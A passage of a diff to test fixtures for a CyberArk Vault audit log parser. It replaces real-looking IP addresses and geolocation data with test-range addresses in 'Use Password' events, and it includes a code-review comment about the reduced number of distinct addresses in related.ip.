Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:23:17\",\"IsoTimestamp\":\"2021-03-11T20:23:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-34.123.103.115-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"testing\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"81.32.170.205\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374522Z", + "original": "\u003c5\u003e1 2021-03-11T20:23:17Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 11 12:23:17\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-11T20:23:17Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n 
\u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003ePSM\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\u003c/File\u003e\\n \u003cStation\u003e10.0.2.2\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003etesting\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.13\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSHKeys\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"adrian\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 11 12:23:17\",\"IsoTimestamp\":\"2021-03-11T20:23:17Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"PSM\",\"File\":\"Root\\\\Operating System-UnixSSHKeys-67.43.156.15-adrian\",\"Station\":\"10.0.2.2\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"testing\",\"ExtraDetails\":\"\",\"Message\":\"Use 
Password\",\"GatewayStation\":\"67.43.156.13\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSHKeys\"},{\"Name\":\"UserName\",\"Value\":\"adrian\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", "action": "use password", @@ -748,39 +694,18 @@ } }, "destination": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "34.123.103.115", "user": { "name": "testark" }, - "ip": "34.123.103.115" + "address": "67.43.156.15", + "ip": "67.43.156.15" }, "source": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "ES-B", - "city_name": "Barcelona", - "country_iso_code": "ES", - "country_name": "Spain", - "region_name": "Barcelona", - "location": { - "lon": 2.1611, - "lat": 41.3891 - } - }, - "address": "81.32.170.205", "user": { "name": "Administrator" }, - "ip": "81.32.170.205" + "address": "67.43.156.13", + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -796,7 +721,7 @@ }, "@timestamp": "2021-03-14T13:49:35.000Z", "file": { - "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark" + "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark" }, "ecs": { "version": "1.12.0" 
@@ -807,23 +732,22 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-14T13:49:35Z", - "gateway_station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty 
Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n 
\u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"67.43.156.15\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"ResetImmediately\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"failure\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" Value=\"0\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastFailDate\" Value=\"1615729572\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"ReconcileTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMErrorDetails\" Value=\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", "message": "Use Password", "issuer": "Administrator", "rfc5424": true, "ca_properties": { "other": {}, - "address": "34.123.103.115", + "address": "67.43.156.15", "creation_method": "PVWA", "cpm_status": "failure", "policy_id": "UnixSSH", 
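Review bot: In the -807 hunk `cyberarkpas.audit.gateway_station` and `ca_properties.address` both become 67.43.156.15, so `related.ip` shrinks from three distinct addresses to two and the fixture can no longer tell whether the gateway-station value is actually collected into `related.ip` or merely deduplicated away behind the target address (the -932 hunk has the same collapse). The event in the -688 hunk keeps three distinct addresses by giving the gateway its own value, and the same could be done here with another address from the supported set, e.g. `"gateway_station": "<THIRD_SUPPORTED_IP>"`, mirrored in the `raw` and `event.original` strings and in `related.ip`. The enclosing event object continues past the hunk.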
@@ -835,9 +759,9 @@
 "reset_immediately": "ReconcileTask",
 "last_task": "ReconcileTask"
 },
- "file": "Root\\Operating System-UnixSSH-34.123.103.115-testark",
+ "file": "Root\\Operating System-UnixSSH-67.43.156.15-testark",
 "safe": "partner",
- "station": "81.32.170.205",
+ "station": "67.43.156.13",
 "action": "Use Password",
 "timestamp": "Mar 14 06:49:35",
 "desc": "Use Password"
@@ -848,8 +772,8 @@ }, "event": { "severity": 2, - "ingested": "2021-06-09T10:24:32.349048100Z", - "original": "\u003c5\u003e1 2021-03-14T13:49:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n \u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"34.123.103.115\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty 
Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:35\",\"IsoTimestamp\":\"2021-03-14T13:49:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-34.123.103.115-testark\",\"Station\":\"81.32.170.205\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use 
Password\",\"GatewayStation\":\"34.71.250.247\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"34.123.103.115\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", + "ingested": "2021-12-09T13:36:52.374527900Z", + "original": "\u003c5\u003e1 2021-03-14T13:49:35Z VAULT {\"format\":\"elastic\",\"version\":\"1.0\",\"raw\":\"\u003csyslog\u003e\\n\\n \u003caudit_record\u003e\\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\\n \u003cTimestamp\u003eMar 14 06:49:35\u003c/Timestamp\u003e\\n \u003cIsoTimestamp\u003e2021-03-14T13:49:35Z\u003c/IsoTimestamp\u003e\\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\\n \u003cProduct\u003eVault\u003c/Product\u003e\\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\\n \u003cMessageID\u003e308\u003c/MessageID\u003e\\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\\n \u003cAction\u003eUse Password\u003c/Action\u003e\\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\\n \u003cSafe\u003epartner\u003c/Safe\u003e\\n \u003cFile\u003eRoot\\\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\\n \u003cLocation\u003e\u003c/Location\u003e\\n 
\u003cCategory\u003e\u003c/Category\u003e\\n \u003cRequestId\u003e\u003c/RequestId\u003e\\n \u003cReason\u003e\u003c/Reason\u003e\\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\\n \u003cMessage\u003eUse Password\u003c/Message\u003e\\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\\n \u003cCAProperties\u003e\\n \u003cCAProperty Name=\\\"PolicyID\\\" Value=\\\"UnixSSH\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"UserName\\\" Value=\\\"testark\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"Address\\\" Value=\\\"67.43.156.15\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"ResetImmediately\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMStatus\\\" Value=\\\"failure\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"RetriesCount\\\" Value=\\\"0\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastFailDate\\\" Value=\\\"1615729572\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"LastTask\\\" Value=\\\"ReconcileTask\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CPMErrorDetails\\\" Value=\\\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. 
code: 8031\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"CreationMethod\\\" Value=\\\"PVWA\\\"\u003e\u003c/CAProperty\u003e\\n \u003cCAProperty Name=\\\"DeviceType\\\" Value=\\\"Operating System\\\"\u003e\u003c/CAProperty\u003e\\n \u003c/CAProperties\u003e\\n \u003c/audit_record\u003e\\n\\n\u003c/syslog\u003e\",\"syslog\":{\"audit_record\":{\"Rfc5424\":\"yes\",\"Timestamp\":\"Mar 14 06:49:35\",\"IsoTimestamp\":\"2021-03-14T13:49:35Z\",\"Hostname\":\"VAULT\",\"Vendor\":\"Cyber-Ark\",\"Product\":\"Vault\",\"Version\":\"11.7.0000\",\"MessageID\":\"308\",\"Desc\":\"Use Password\",\"Severity\":\"Info\",\"Issuer\":\"Administrator\",\"Action\":\"Use Password\",\"SourceUser\":\"\",\"TargetUser\":\"\",\"Safe\":\"partner\",\"File\":\"Root\\\\Operating System-UnixSSH-67.43.156.15-testark\",\"Station\":\"67.43.156.13\",\"Location\":\"\",\"Category\":\"\",\"RequestId\":\"\",\"Reason\":\"\",\"ExtraDetails\":\"\",\"Message\":\"Use Password\",\"GatewayStation\":\"67.43.156.15\",\"CAProperties\":{\"CAProperty\":[{\"Name\":\"PolicyID\",\"Value\":\"UnixSSH\"},{\"Name\":\"UserName\",\"Value\":\"testark\"},{\"Name\":\"Address\",\"Value\":\"67.43.156.15\"},{\"Name\":\"ResetImmediately\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMStatus\",\"Value\":\"failure\"},{\"Name\":\"RetriesCount\",\"Value\":\"0\"},{\"Name\":\"LastFailDate\",\"Value\":\"1615729572\"},{\"Name\":\"LastTask\",\"Value\":\"ReconcileTask\"},{\"Name\":\"CPMErrorDetails\",\"Value\":\"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031\"},{\"Name\":\"CreationMethod\",\"Value\":\"PVWA\"},{\"Name\":\"DeviceType\",\"Value\":\"Operating System\"}]}}}}", "code": "308", "kind": "event", "action": "use password", 
@@ -873,39 +797,18 @@
 }
 },
 "destination": {
- "geo": {
- "continent_name": "North America",
- "country_name": "United States",
- "location": {
- "lon": -97.822,
- "lat": 37.751
- },
- "country_iso_code": "US"
- },
- "address": "34.123.103.115",
 "user": {
 "name": "testark"
 },
- "ip": "34.123.103.115"
+ "address": "67.43.156.15",
+ "ip": "67.43.156.15"
 },
 "source": {
- "geo": {
- "continent_name": "Europe",
- "region_iso_code": "ES-B",
- "city_name": "Barcelona",
- "country_iso_code": "ES",
- "country_name": "Spain",
- "region_name": "Barcelona",
- "location": {
- "lon": 2.1611,
- "lat": 41.3891
- }
- },
- "address": "81.32.170.205",
 "user": {
 "name": "Administrator"
 },
- "ip": "81.32.170.205"
+ "address": "67.43.156.13",
+ "ip": "67.43.156.13"
 },
 "tags": [
 "preserve_original_event"
@@ -921,7 +824,7 @@
 },
 "@timestamp": "2021-03-15T10:31:54.000Z",
 "file": {
- "path": "Root\\Operating System-UnixSSH-34.123.103.115-testark"
+ "path": "Root\\Operating System-UnixSSH-67.43.156.15-testark"
 },
 "ecs": {
 "version": "1.12.0"
@@ -932,23 +835,22 @@ "testark" ], "ip": [ - "81.32.170.205", - "34.123.103.115", - "34.71.250.247" + "67.43.156.13", + "67.43.156.15" ] }, "cyberarkpas": { "audit": { "severity": "Info", "iso_timestamp": "2021-03-15T10:31:54Z", - "gateway_station": "34.71.250.247", - "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:31:54\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:31:54Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-34.123.103.115-testark\u003c/File\u003e\n \u003cStation\u003e81.32.170.205\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e34.71.250.247\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" Value=\"testark\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"Address\" Value=\"34.123.103.115\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CPMStatus\" Value=\"success\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"RetriesCount\" 
Value=\"-1\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastTask\" Value=\"VerifyTask\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"LastSuccessVerification\" Value=\"1615803764\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"CreationMethod\" Value=\"PVWA\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"DeviceType\" Value=\"Operating System\"\u003e\u003c/CAProperty\u003e\n \u003c/CAProperties\u003e\n \u003c/audit_record\u003e\n\n\u003c/syslog\u003e", + "gateway_station": "67.43.156.15", + "raw": "\u003csyslog\u003e\n\n \u003caudit_record\u003e\n \u003cRfc5424\u003eyes\u003c/Rfc5424\u003e\n \u003cTimestamp\u003eMar 15 03:31:54\u003c/Timestamp\u003e\n \u003cIsoTimestamp\u003e2021-03-15T10:31:54Z\u003c/IsoTimestamp\u003e\n \u003cHostname\u003eVAULT\u003c/Hostname\u003e\n \u003cVendor\u003eCyber-Ark\u003c/Vendor\u003e\n \u003cProduct\u003eVault\u003c/Product\u003e\n \u003cVersion\u003e11.7.0000\u003c/Version\u003e\n \u003cMessageID\u003e308\u003c/MessageID\u003e\n \u003cDesc\u003eUse Password\u003c/Desc\u003e\n \u003cSeverity\u003eInfo\u003c/Severity\u003e\n \u003cIssuer\u003eAdministrator\u003c/Issuer\u003e\n \u003cAction\u003eUse Password\u003c/Action\u003e\n \u003cSourceUser\u003e\u003c/SourceUser\u003e\n \u003cTargetUser\u003e\u003c/TargetUser\u003e\n \u003cSafe\u003epartner\u003c/Safe\u003e\n \u003cFile\u003eRoot\\Operating System-UnixSSH-67.43.156.15-testark\u003c/File\u003e\n \u003cStation\u003e67.43.156.13\u003c/Station\u003e\n \u003cLocation\u003e\u003c/Location\u003e\n \u003cCategory\u003e\u003c/Category\u003e\n \u003cRequestId\u003e\u003c/RequestId\u003e\n \u003cReason\u003e\u003c/Reason\u003e\n \u003cExtraDetails\u003e\u003c/ExtraDetails\u003e\n \u003cMessage\u003eUse Password\u003c/Message\u003e\n \u003cGatewayStation\u003e67.43.156.15\u003c/GatewayStation\u003e\n \u003cCAProperties\u003e\n \u003cCAProperty Name=\"PolicyID\" Value=\"UnixSSH\"\u003e\u003c/CAProperty\u003e\n \u003cCAProperty Name=\"UserName\" 
